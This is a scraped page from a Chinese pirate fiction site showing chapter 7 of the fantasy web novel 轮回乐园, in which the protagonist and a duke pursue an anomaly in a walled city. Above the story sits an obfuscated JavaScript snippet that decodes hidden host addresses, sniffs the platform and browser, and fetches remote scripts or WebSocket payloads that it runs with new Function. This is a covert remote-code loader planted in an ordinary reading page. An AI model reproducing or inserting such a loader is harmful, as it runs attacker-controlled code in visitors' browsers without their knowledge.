笔趣阁

字:
关灯 护眼
笔趣阁 > 轮回乐园 > 第七章:惊变
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第七章:惊变

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
血雨倾盆,方才还热闹的中心广场,此时遍地狼藉,平民们都跑到附近的建筑内。
  
  永生之神的石像,当着所有人的面活了过来,且仰天咆哮,那暴戾的姿态,无论怎么看,都不属于友善神灵。
  
  或者说,永生之神所散发出那混沌般的恶意,是很多古神都无法匹敌的。
  
  苏晓不知道永生之神是否为他遇到过最强的神灵系,但这绝对是最狂乱、暴戾的一位,此刻他距离永生之神几百米远,都隐隐感受到,自己正被那种狂乱与暴戾所影响。
  
  就在所有人都认为,中心广场必定会有一场血战,搞不好都要波及整个中心城区时,永生之神展开双臂咆哮,它的两只手爪下一秒刺入到自己的胸膛内,最后完全扯开自己的胸膛。
  
  啪!!
  
  十几米高的永生之神化为金色鲜血炸开,这些金色血珠四处飞溅,将整个中心广场都波及在内,但这却不是攻击,这些金色血珠倒卷上天空,十几秒后,倾盆的血雨停了。
  
  无论怎么看,这都不是永生之神要脱困,而是有人故意要将其封印打破,但永生之神以残存的意识力量,重新关上了这封禁。
  
  原本已准备搏命,乃至于损失整个怒锤机构的公爵,被眼前这一幕搞糊涂,实际情况与预想情况,落差太大。
  
  不过永生之神扯开自身胸膛,化为大片金色血珠的一幕,让公爵想起自己祖父曾说过的一句话。
  
  ‘如果没有神灵,我们早就成了徘徊在死寂中的躯壳。’
  
  天空中的血雨停了没一会,倾盆暴雨落下,这次是正常的雨水,将街道、房屋逐渐冲洗干净。
  
  “这……”
  
  公爵手下的面具男开口,他是彻底茫然了,犹豫了下,他向公爵低声问道:
  
  “大人,那些食人怪……”
  
  听到此言,公爵只感觉一股怒气在胸膛酝酿,他这部下特别能打,还忠心耿耿,什么都好,就是脑子不算聪明。
  
  公爵斜后方的贵公子·克兰克,当即把面具男扯了回去,都这时候了,还放什么食人怪,莫非嫌背锅背的不彻底?
  
  见一切都平息,公爵心中松了口气,蒸汽神教和治愈教会争夺超凡事件管制权是一码事,但在最繁华的中心城区大肆破坏,是另一码事。
  
  否则的话,蒸汽神教的人,也不会选择抓力量大,恢复力强,但没有大范围破坏能力的食人怪。
  
  “白夜,我们相识这么久,你竟然第一个怀疑我。”
  
  公爵看着广场中心的那堆碎石,只要这件事的后续处理好,同样能达到他所预期的效果。
  
  “……”
  
  苏晓没说话,他抬手指向北城区方向,因四个城区都太大,位于中心街区时,眺望北城区,只能隐隐看到北城区边缘的大钟楼。
  
  公爵顺着苏晓所指的方向看去,暴雨中,他看到一根紫黑色光柱耸立在远处的天地间,那方向,似乎是瓦迪家族的驻地。
  
  看到这异象,公爵转瞬间想通很多事,首先,要在神祭日搞些事情的,一共有两家。
  
  四大势力中,治愈教会是神祭日的主办一方,最先被排除,而高墙议会,议会更多是管理平民,哪怕这边的超凡力量不弱,也更多集中在民生、税务等方面。
  
  城内不能缺少的势力只有两个,治愈教会与高墙议会,前者让城内不被死寂的力量侵蚀,变为城外那般恶土。
  
  而高墙议会,则保证了高墙城的人口增长稳定,以及人们的生活富足等。
  
  剩余的蒸汽神教和瓦迪家族,一方是科技开发,另一方是商业,高墙城没有他们后,会很难受。
  
  之前意图要在神祭日搞事的有两方,分别是蒸汽神教和瓦迪家族。
  
  蒸汽神教的目的纯粹,虽然搞事,但坏心眼不多,计划简单粗暴,神祭日开始后,在中心广场放出二十多名食人怪,然后怒锤机构登场,在民众们的注视下,怒锤机构成员们将这二十多名食人怪擒下或格杀,到时怒锤机构肯定名气大涨。
  
  从风险上来讲,就算此事提前暴露,最多是其他三方对蒸汽神教进行指责,具体的惩戒措施是不会有的,四方彼此的硬实力相差无多,还都以高墙城为一个整体,真的闹翻,哪边都不好受。
  
  至于这些食人怪哪来的,那还用问吗,瓦迪家族不顾城内禁令,暗中贩卖食人怪,准备驯化后当苦力,结果看管不严,让其跑出来了。
  
  在以往,瓦迪家族是商人风格,被泼脏水后,虽会气的跳脚,但更多是选择骂一顿后,就当无事发生。
  
  公爵的确是这样计划的,问题是,他这次真的小看瓦迪家族了,相比瓦迪家族在北城区搞出的事,公爵这边放食人怪,简直小巫见大巫。
  
  突降血雨,永生之神的石像复活,这一切都是瓦迪家族所安排,瓦迪家族是要在中心广场酿造一场惨剧?并不是,瓦迪家族所布置的这一切,是在掩人耳目。
  
  今天是神祭日,所有超凡机构的目光,都会死死盯着中心广场,一旦这里有所变故,整个高墙城有七成以上的超凡者,会全速向这边扑。
  
  此等时机,无论瓦迪家族在北城区搞出多么骇人听闻的事,都没人去阻止他们,眼下,他们就是这样做的。
  
  想通这些,公爵以询问的目光向苏晓看来。
  
  “瓦迪家族。”
  
  苏晓开口,闻言,公爵点了点头,知道苏晓也猜到了当下的局面。
  
  “瓦迪家族是要做什么?让永生之神降临?如果是的话,他们已经做到,白夜,你的想法是?这方面,你更专业。”
  
  公爵这不是谦虚,作为治疗院副院长的苏晓,理应是这方面的专业人士。
  
  苏晓这身份虽是替代而来,不过他当过处刑机关的军团长,也就是猎幽鬼,还在暗狱世界的守望公会当过神灵猎人,后续又在联盟星,当过收容机构的领袖等,有此等丰富的经历与经验,他处理这方面的事,当然得心应手。
  
  虽还没到现场,不过苏晓对远处北城区那连通在天地间的紫黑色光柱,已有了初步的判断,就算还没过去,那边的世界排斥现象,已强烈到局部空间崩塌的程度。
  
  幽暗大陆这鬼地方,除了高墙城内,其他地方都被死寂之力侵蚀成恶土,那紫黑色光柱要‘违和’到什么程度?才能让本世界出现此等情况的世界排斥现象?
  
  别忘记,之前克兰克成为世界之子,这世界连个反应都没有,就给点世界之力,然后就没然后了。
  
  可现在,城北区的世界排斥现象太强烈,这只有一种可能,就是有「界外存在」,在没有「预热」的情况下,直接进入到本世界,而且来的还不是一个「界外存在」,搞不好是一群。
  
  做个简单的比喻,上个世界苏晓在潘多拉星时,在没有乌鹰·索拉罗的筹备下,幽冥大帝直接强闯进潘多拉星,就会是眼下这阵仗。
  
  “应该是天外的东西,具体是什么不清楚。”
  
  苏晓说话间,已在雨中向北城区方向赶去,见此,公爵下令让怒锤机构守着中心广场,并去附近的治愈教会大教堂,请来几名修女,以心灵系的圣痕力量,安抚惶恐的民众们,如果没其他变故,神祭日继续,永生之神的石像,早些年就准备好备用的。
  
  下达一连串的命令后,公爵向苏晓消失的方向赶去。
  
  ……
  
  暴雨中,纵跃在建筑顶的苏晓因速度太快,偶尔会冲破一层水幕,并留下一声炸响。
  
  之前苏晓始终怀疑蒸汽神教,因为蒸汽神教有十足的动机,现在看来,既没怀疑错,也怀疑错了。
  
  蒸汽神教所要搞的事,更像是自导自演,而瓦迪家族在北城区搞出的动静,完全是一副丧心病狂,不惜任何代价的态势,看那疯狂程度,哪怕将高墙城完全夷为平地,也要达成目的。
  
  瓦迪家族这是彻底疯了,是何等处境,能将聚拢高墙城近五分之二财富的瓦迪家族,逼到此等程度?这是苏晓最想知道的。
  
  他估测,此事或许和死寂城有关,否则晋升任务不会指向这方面,有一点能确定,晋升任务的最终一环,肯定是直指死寂城内最根本的东西。
  
  风雨声在耳旁呼啸而过,当苏晓抵达城北区边缘地带时,天色因暴雨的关系,已变得犹如傍晚。
  
  雨中,苏晓站在大钟楼顶,俯瞰城北区的景象,这里更偏向于蒸汽时代+次电气时代的工业区景象,四处可见的大烟囱冒着灰黄色烟霾,天色昏暗,雨水让楼瓦顶有所反光,此刻,后城区那耸立在天地间,几百米粗的紫黑色光柱,尤为显眼。
  
  从北城区边缘到后城区很远,苏晓对此早有准备,他等待片刻后,要等的人没来,公爵跃上了大钟楼顶,公爵道:
  
  “中心公园那边稳住了,城北区怎么样?”
  
  “太远,看不清楚。”
  
  “那现在就出发,不能再耽搁。”
  
  公爵作势要跃下大钟楼,一股空间波动在下面出现,钟楼顶阁内,空间鬼门打开,休司、布布汪、巴哈最先走。
  
  阿姆没来,它被苏晓留在了中心广场,以免那边有突发情况,对于公爵,苏晓始终是防一手的。
  
  休司关上空间鬼门后,过了两秒就重新拉开,轰的一声,浅紫色薄雾从里面涌出,里面所蕴含的扭曲、疯狂、不祥,强到让人无法忽略。
  
  “连通北边的后城区?”
  
  公爵开口,巴哈答道:“对,位置在瓦迪家族的庄园附近。”
  
  听闻此言,公爵看向休司,那有些火热的目光,看的休司下意识退后几步。
  
  公爵一边走向空间鬼门,一边开口问道:“小伙子不错,成年了吗。”
  
  闻言,休司下意识向苏晓看来,想征求苏晓怎么回答,与贵为蒸汽神教领袖的公爵交谈,他心中特别紧张。
  
  发现苏晓并没给出指示,休司只能点点头。
  
  “我有个女儿,和你差不多大。”
  
  言罢,公爵走进空间鬼门内,这让休司更加无可适从。
  
  “怎么着?动心了?公爵还真有和你差不多大的女儿,准确的说,那是他长女用自己的细胞,培育出的独立个体,也就是妹妹,别这么惊讶,蒸汽神教有些科技,是你无法想象的,而且公爵他家的那几人,思维方式都异于常人。”
  
  巴哈落在休司肩膀上,把休司压的哼了下,见此,巴哈改落到苏晓肩膀上。
  
  苏晓拿出怀表看了眼,大概过了两分钟,公爵又从空间鬼门内走出,阴沉着神情道:“快些。”
  
  “哦。”
  
  见公爵没死,也没其他异常,苏晓这才走进空间鬼门内,眼下这种用公爵探雷的机会不多,北城区惊变,让公爵的心神有点乱了,毕竟,这事稍有处理不当,蒸汽神教就得背个大锅。
  
  走进空间鬼门,当阴冷的触感消失后,周边世界清晰起来,最先迎面而来的,是潮湿的寒冷,以及浅紫色薄雾。
  
  此地是瓦迪家族庄园的前方一公里处,因瓦迪庄园的存在,周边居住区非富即贵,多为二层建筑,或是单层的大宅。
  
  但在此时,以瓦迪家族庄园为中心,周边的建筑群很安静,居住在此的权贵们,都去中心城区参加神祭日,留下的都是仆从。
  
  这些仆从都保持着向前逃,却突然停下的动作,他们眉心处生出根扭曲的树叉,树叉顶部结了朵颜色绯红的花。
  
  这些人的死状格外痛苦,尤其是他们的表情还被定格,他们嘴巴大张,眼睛睁大到都快凸出来,双手掐着喉咙,牙关紧咬,涎水顺着口角流出,眼泪鼻涕齐出。
  
  一种没有歌词,单纯哼唱而出的歌谣声传来,听声音是女声。
  
  巴哈与布布汪同时做出反应,巴哈没入到异空间内,布布汪融入环境,这歌谣声来的太突然,它们只能以此自保,至于苏晓的安危,对这方面,巴哈与布布汪都特别放心,根据它们的经验,这种歌谣声,不是针对意志力,就是灵魂强度。
  
  歌谣声传入到苏晓耳中,他感觉到,自己体内的生命力仿佛在震动,一股力量企图将他的生物特性的生命力,扭变为植物生命力,从而杀死他,对此,他选择无视。
  
  一只可以掰弯铁丝的手,没可能掰动水缸粗细的实心铁柱。
  
  果不其然,苏晓只是感觉自身生命力微微躁动了下,之后就没反应,施术者显然是也清楚了情况,不再将术式的效能浪费在苏晓身上。
  
  公爵的一只机械眼亮起红光,开始扫描周边,对他来讲,植物生命力?汽油这种工业燃料,他都能当作驱动体魄的能量,自身生命力被扭变,简直是毛毛雨。
  
  啪!
  
  休司双手拍上自己的双耳,两股鲜血从他的耳洞内串出,在这同时,他眉心生出的枝杈干枯脱落,完全丧失听力后,自然就不会被这种诱发性能力所影响。
  
  苏晓看了眼休司,心中对这少年的评价高了几分后,就不在理会,耳膜穿孔与耳蜗损伤而已,小伤,能治。
  
  歌谣声戛然而止,与之伴随的气息,嗖的一下消失,逃跑速度极快。
  
  公爵的软金属披风扬起,一只只机械鹰隼飞出,突破几股音障后,消失在视线中。
  
  咔哒~
  
  公爵右臂上探出根与手臂平齐的修长炮管,伴随着嗡嗡的蓄能声,以及他电子眼中的红光越来越深,一发构造精密的中小型炮弹轰出,这炮弹飞出后,尾部的绿灯就滴滴滴作响,在锁定了某个目标后,尾部陡然亮起红灯,向目标所在的方向追踪而去。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师